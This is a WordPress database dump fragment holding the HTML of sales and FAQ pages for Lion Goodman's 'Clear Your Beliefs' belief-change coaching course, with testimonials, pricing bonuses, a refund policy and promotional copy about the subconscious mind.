href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:47:35', '2014-12-14 18:47:35', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2041, 2, '2014-12-14 13:54:32', '2014-12-14 18:54:32', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new 